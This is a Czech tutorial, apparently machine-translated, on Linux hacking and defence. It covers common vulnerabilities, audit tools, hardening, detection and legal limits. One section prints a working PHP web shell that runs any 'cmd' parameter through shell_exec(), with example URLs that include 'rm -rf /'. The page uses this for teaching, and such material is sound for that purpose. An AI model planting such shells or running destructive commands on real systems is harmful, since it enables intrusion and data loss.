Tutoriál hackování Linuxu: Ubuntu Příkazy a nástroje

⚡ Chytré shrnutí

Hacking Linuxu je praxe hledání a zneužívání slabin v linuxových systémech a tato stránka vysvětluje zranitelnosti, na které se útočníci zaměřují, použité auditovací nástroje a ovládací prvky, které chrání server.

  • ???? Proč je to důležité: Linux provozuje většinu webových serverů a cloudových úloh, což z něj dělá vysoce hodnotný cíl.
  • 🔍 Kompromis mezi open source: Veřejný zdrojový kód pomáhá správcům rychle aktualizovat systém a útočníkům hledat chyby.
  • 🧰 Nástroje auditu: Nessus, Nmap, Lynis a OpenVAS odhalit otevřené porty, chybějící záplaty a slabou konfiguraci.
  • ???? Vektory útoku: Slabé SSH přihlašovací údaje, neinstalovaná jádra, špatná konfigurace a webové shelly jsou příčinou většiny kompromitací.
  • 🛡️ Kalení: Správa záplat, posílení SSH, minimální oprávnění a povinné řízení přístupu výrazně snižují expozici.
  • ???? Detekce: Auditní protokoly, kontroly integrity souborů a detekce narušení odhalí narušení dříve, než se škody rozšíří.

Tutoriál hackování Linuxu

Linux je nejrozšířenějším serverovým operačním systémem, zejména pro webové servery. Je open source, což znamená, že zdrojový kód si může přečíst kdokoli. Tato transparentnost je oboustranná: správci jej používají k rychlému nalezení a opravě chyb, zatímco útočníci studují stejný kód a hledají slabiny, které by mohli zneužít. Hacking Linuxu je praktika zneužívání těchto slabin k získání neoprávněného přístupu k systému.

Níže uvedené části se zabývají tím, co je Linux, bezpečnostními zranitelnostmi, které ho ovlivňují, a praktickým pohledem na hacking s... Ubuntua protiopatření, která můžete zavést.

Rychlá poznámka k Linuxu

Linux je operační systém s otevřeným zdrojovým kódem. Je na něm postaveno mnoho distribucí, včetně Red Hat Enterprise Linux, Fedora, Debian a UbuntuProtože je zdrojový kód zveřejněn, mohou si ho prohlédnout výzkumníci, dodavatelé i útočníci. Útočníci tento přístup využívají k hledání zneužitelných chyb, zatímco stejná viditelnost umožňuje správcům vydávat opravy rychleji, než to často zvládají uzavřené platformy. Linux běží jako operační systém pro servery, stolní počítače, tablety nebo mobilní zařízení.

Linuxové programy lze ovládat pomocí grafického rozhraní nebo z příkazového řádku. Práce z příkazového řádku je rychlejší a přesnější než klikání přes grafické uživatelské rozhraní, a proto bezpečnostní testeři pracující na distribucích, jako je Kali Linux tráví téměř veškerý čas v terminálu. Znalost základních příkazů je proto praktickým předpokladem.

Viz Linux tutoriál pro základy a pro Kali Linux konzultace pro distribuci zaměřenou na bezpečnost, která je na nich postavena.

Běžné zranitelnosti zabezpečení Linuxu a vektory útoků

Útoky na Linux se zřídka spoléhají na exotické exploity. Telemetrie publikovaná v letech 2025 a 2026 ukazuje, že většina kompromitací traczpět k malé sadě opakujících se slabin a jejich znalost vám napoví, kam nejprve vynaložit obranné úsilí.

  • Slabé nebo opakovaně použité přihlašovací údaje SSH — pokusy o hrubou sílu a vykrádání přihlašovacích údajů proti SSH přístupnému k internetu představují velkou většinu nepřátelské aktivity pozorované na linuxových koncových bodech.
  • Nezapracované chyby jádra a balíčků — tým linuxového jádra se v roce 2024 stal autoritou pro číslování CVE a hlášené CVE jádra vzrostly z přibližně 290 v roce 2023 na více než 3 500 v následujícím roce, takže se záplaty rychle hromadí.
  • Špatné konfigurace — výchozí účty, zbytečné démony, soubory zapisovatelné všem a permisivní pravidla Sudo udělují oprávnění, k jejichž získání nebylo nutné žádné zneužití.
  • Zranitelné webové aplikace - nedostatky, jako např. SQL injection a cross-site scripting umožňuje útočníkovi dostat se k serveru prostřednictvím aplikace, nikoli přes operační systém. Webové shelly jsou nejčastějším škodlivým artefaktem, který se nachází na napadených linuxových serverech.
  • Chyby eskalace oprávnění — lokální chyby, které z omezeného účtu udělají root účet. Některé z nich přežily v jádře bez povšimnutí více než deset let, než byly odhaleny.
  • Riziko dodavatelského řetězce a závislosti — balíčky třetích stran, jazykové knihovny a obrazy kontejnerů stahují kód, který nikdo z provozního týmu nezkontroloval.

Žádný z těchto útoků nevyžaduje útočníka k prolomení samotného Linuxu. Analýzy útoků z roku 2025 zjistily, že zhruba čtyři z pěti se vůbec netýkaly malwaru, ale spíše nesprávné konfigurace a odcizení přihlašovacích údajů.

Linuxové hackerské nástroje

Bezpečnostní testeři a systémoví administrátoři sahají po stejných skenerech: jedna strana k nalezení slabin dříve, než je udělá útočník, druhá k ověření platnosti oprav. Níže uvedené nástroje jsou ty, které se nejčastěji používají k auditu hostitele s Linuxem.

Nástroj Typ Licence Typické použití v Linuxu
Nessus Skener zranitelnosti Komerční Prohledává konfigurační nastavení, chybějící opravy a síťové služby ve smíšených prostředích.
Nmap Skener sítě a portů open source Identifikuje hostitele spuštěné na serveru, služby, které zpřístupňují, a které porty jsou otevřené.
Lynis Audit a zabezpečení hostitele open source Provádí audit běžícího systému podle benchmarků pro zvýšení bezpečnosti a hlásí konkrétní kroky nápravy.
OpenVAS Skener zranitelnosti open source Skenování zranitelností sítě, spravované společností Greenbone jako součást její komunitní edice.

Tento seznam není vyčerpávající; poskytuje představu o nástrojích dostupných pro audit Ubuntu a další linuxové systémy. Starší příručky stále doporučují SARA, Security Auditor's Research Assistant, ale jeho finální vydání pochází z roku 2009 a jeho projektové stránky jsou offline, takže Lynis a OpenVAS jsou zachované alternativy.

Hacking Activity: Hack a Ubuntu Linux systém využívající PHP

V tomto praktickém scénáři se podíváme na to, jak lze dosáhnout linuxového hostitele prostřednictvím webové aplikace, na příkladu PHP. Cílem není žádná živá oběť. Pokud si to chcete vyzkoušet, nainstalujte si LAMPP, linuxovou verzi XAMPP, na svůj vlastní počítač.

PHP dodává se se dvěma funkcemi, které lze použít ke spouštění příkazů operačního systému: exec() a shell_exec(). Funkce exec() vrací poslední řádek výstupu příkazu, zatímco shell_exec() vrací celý výsledek příkazu jako řetězec.

Pro demonstrační účely předpokládejme, že se útočníkovi podaří nahrát následující soubor na webový server.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

TADY,

Výše uvedený skript bere příkaz z proměnné GET s názvem cmd. Příkaz se provede pomocí shell_exec() a výsledek se vrátí do prohlížeče.

Výše uvedený kód lze zneužít pomocí následujícího URL

http://localhost/cp/konsole.php?cmd=ls%20-l

TADY,

  • „…konsole.php?cmd=ls%20-l“ přiřadí hodnotu ls –l proměnné cmd.

Příkaz na Ubuntu server se proto spustí jako

shell_exec('ls -l') ;

Spuštění výše uvedeného kódu na webovém serveru dává výsledek podobný následujícímu.

Výpis prohlížeče PHP skriptu s obsahem adresáře a oprávněními k souborům na Ubuntu Server

Výstup jednoduše zobrazí soubory v aktuálním adresáři a jejich oprávnění.

Nyní předpokládejme, že útočník místo toho zadá následující příkaz.

rm -rf /

TADY,

  • „rm“ odstraní soubory.
  • „rf“ způsobí, že příkaz rm bude spuštěn v rekurzivním režimu a smaže všechny složky a soubory.
  • „/“ instruuje příkaz k zahájení mazání z kořenového adresáře.

Útok URL vypadalo by to nějak takto

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Jeden neověřený parametr proto stačí k tomu, aby útočníkovi poskytl jakákoli oprávnění, která účet webového serveru vlastní. Následující dvě části slouží k tomu, aby tomu zabránily a zachytily to, když prevence selže.

Jak zabránit hackerským útokům v Linuxu

Hacking Linuxu využívá zranitelností v operačním systému a v softwaru, který na něm běží. Organizace může přijmout následující opatření, aplikovaná společně, k uzavření většiny výše popsaných zranitelností.

  • Správa oprav — záplaty opravují chyby, které útočníci zneužívají k napadení systému. Definovaná politika zajišťuje, že relevantní aktualizace jsou instalovány okamžitě, a ne kdykoli si na ně někdo vzpomene.
  • Správná konfigurace OS — zakázat neaktivní uživatelské účty a nepotřebné démony. Změnit výchozí nastavení, včetně výchozích uživatelských jmen, hesel sdílených aplikací a výchozích čísel portů.
  • Kalení SSH — zakázat ověřování přihlášení a hesla roota, povolit pouze pojmenované uživatele nebo skupiny a omezit počet opakování ověřování. Tím se uzavře nejvíce napadáný vstupní bod v Linuxu.
  • Nejmenší výsada — udělte účtům a službám pouze ta práva, která potřebují, a omezte Sudo na konkrétní příkazy namísto všeobecného administrátorského přístupu.
  • Povinná kontrola přístupu — ponechte si SELinux (rodina Red Hat) nebo AppArmor (Debian a Ubuntu) v režimu vynucení, aby se ohrožená služba nemohla dostat ke zbytku systému.
  • Ověření vstupu — výše uvedená demonstrace funguje pouze proto, že data požadavku dosáhnou shellové funkce. Nikdy nepředávejte uživatelský vstup funkci exec() nebo shell_exec().
  • Firewally a segmentace — zpřístupnit pouze porty, které služba skutečně potřebuje, pomocí firewall a segmentaci sítě, aby se omezilo, k čemu se může napadený hostitel dostat.
  • Systémy detekce narušení — takové nástroje lze použít k detekci neoprávněného přístupu do systému a některé mohou pokus i zablokovat.
  • Testované zálohy — offline, obnovitelné zálohy promění destruktivní příkaz, jako je ten výše, v výpadek, nikoli v trvalou ztrátu.

Jak detekovat kompromitovaný systém Linux

Prevence nakonec selže, takže druhou otázkou je, jak rychle si toho všimnete. Detekce v Linuxu závisí na shromažďování správných důkazů před incidentem, nikoli po něm.

  • Protokolování auditu — auditovací framework jádra, auditd, zaznamenává používání oprávnění, přístup k souborům a systémová volání ve formě, kterou kompromitovaný proces nemůže potichu přepsat. Tyto protokoly přepošlete z hostitele do centrálního sběrného systému.
  • Ověřovací protokoly — série selhání následovaná jedním úspěchem v /var/log/auth.log nebo /var/log/secure je klasický podpis hrubou silou.
  • Neočekávané procesy a spojení — odposlouchávací služba nebo odchozí připojení, které nikdo nedokáže vysvětlit, si zaslouží okamžité prošetření.
  • Monitorování integrity souborů — nástroje, které hašují systémové binární soubory a konfigurační soubory, označují změny v souborech, které by se nikdy neměly měnit.
  • Naplánované úlohy a položky po spuštění — perzistence se obvykle nachází v úlohách cron, jednotkách systemd nebo skriptech profilu shellu.
  • Nové nebo upravené účty — hledejte neznámé uživatele, jakýkoli druhý účet s UID 0 a klíče SSH, které nikdo nepřidal.
  • Adresáře webových serverů — protože webové shelly jsou nejčastějším škodlivým souborem, který se nachází na linuxových serverech, zaslouží si pečlivou pozornost neočekávané soubory skriptů v kořenovém adresáři webu.
  • Plánované audity — spusťte nástroj pro audit hostitele, jako je Lynis, podle plánu a s každou zprávou zacházejte jako s pracovním seznamem, nikoli jako s jednorázovým úkolem.

Pokud najdete důkazy o kompromitaci, izolujte hostitele, před provedením jakýchkoli změn uložte protokoly a obraz disku a znovu sestavte systém ze známého a spolehlivého média, místo abyste se pokoušeli o čištění běžícího systému. Správa důkazů v této práci je popsána v digitální forenzní.

Právní a etické hranice hackování Linuxu

Každá technika na této stránce je legální k používání na systémech, které vlastníte nebo k jejichž testování máte písemné povolení, a téměř jinde je nezákonná. Výše ​​uvedené cvičení je záměrně provedeno proti lokální instalaci právě z tohoto důvodu.

  • Písemné pověření — podepsaný rozsah, dohodnuté testovací okno a jmenovaná kontaktní osoba jsou tím, co odlišuje penetrační test od přestupku. Slovní schválení nestačí.
  • Zůstaňte v dosahu — hostitelé, rozsahy adres a techniky, které nejsou uvedeny, nejsou povoleny, a to ani v případě, že jsou dosažitelné.
  • Zacházejte s daty opatrně — důkazy shromážděné během testu stále obsahují skutečné osobní údaje a musí být bezpečně uloženy a následně zničeny.
  • Zodpovědné hlášení — sdělit zjištění vlastníkovi a před zveřejněním čehokoli poskytnout čas na nápravu.

Právní riziko je reálné: neoprávněný přístup k počítačovému systému je trestným činem podle zákonů, jako je americký zákon o počítačových podvodech a zneužívání (Computer Fraud and Abuse Act) a britský zákon o počítačovém zneužívání (Computer Misuse Act). Pokud si chcete na těchto dovednostech vybudovat kariéru, zvolte uznávanou cestu – bezpečnostní certifikace plus laboratoř, kterou vlastníte vy, nikoli server někoho jiného.

Nejčastější dotazy

Linux těží z přísného oddělení uživatelů a menší plochy pro útoky na desktopy, takže se setkává s mnohem menším počtem komerčně dostupného malwaru. Expozice serverů je jiný příběh – hostitelé Linuxu s přístupem k internetu jsou neustále napadáni a o výsledku rozhoduje kvalita konfigurace.

Skenování podpisů pomáhá na souborových a poštovních serverech, které zpracovávají obsah pro jiné platformy. Pro většinu hostitelů s Linuxem přinášejí záplaty, posílení ochrany a detekce na základě protokolů větší hodnotu, protože většina průniků se vůbec netýká souborů malwaru.

Strojové učení modeluje běžné procesy, přihlašování a chování sítě na hostiteli a poté označuje odchylky, které pevná pravidla přehlédnou – například účet webového serveru spustí shell. Útočníci používají stejné techniky k urychlení průzkumu, takže se obě strany pohybují.

GitHub Copilot dokáže na přímý dotaz navrhovat parametrizované dotazy a bezpečnější alternativy k volání shellu. Trénuje se na veřejném kódu, takže návrhy je stále třeba kontrolovat – berte ho jako asistenta pro první návrh, ne jako bezpečnostní skener.

Oba jsou založeny na Debianu, ale Kali Linux dodává stovky předinstalovaných bezpečnostních a forenzních nástrojů a je určen pro testování. Ubuntu je univerzální distribuce pro stolní počítače a servery a je lepší volbou pro každodenní použití.

Bezpečnostní aktualizace instalujte minimálně v měsíčním cyklu a v případě kritických chyb nebo chybného zabezpečení do několika dnů. Povolte bezobslužné aktualizace zabezpečení a naplánujte restartování, aby se opravy jádra skutečně projevily.

Začněte s administrátorskými oprávněními pro Linux, jako je LPIC nebo RHCSA, přidejte CompTIA Security+ a poté přejděte k praktickému penetračnímu testování nebo správě. tracks. Guru99 vede seznam certifikace kybernetické bezpečnosti s aktuálními požadavky.

Použijte virtuální počítač na vlastním hardwaru nebo schválenou školicí platformu, jako je například ZkusteHackMe, kde jsou cíle poskytnuty přesně k tomuto účelu. Nikdy netestujte systém, který nevlastníte, bez písemného souhlasu.

Shrňte tento příspěvek takto: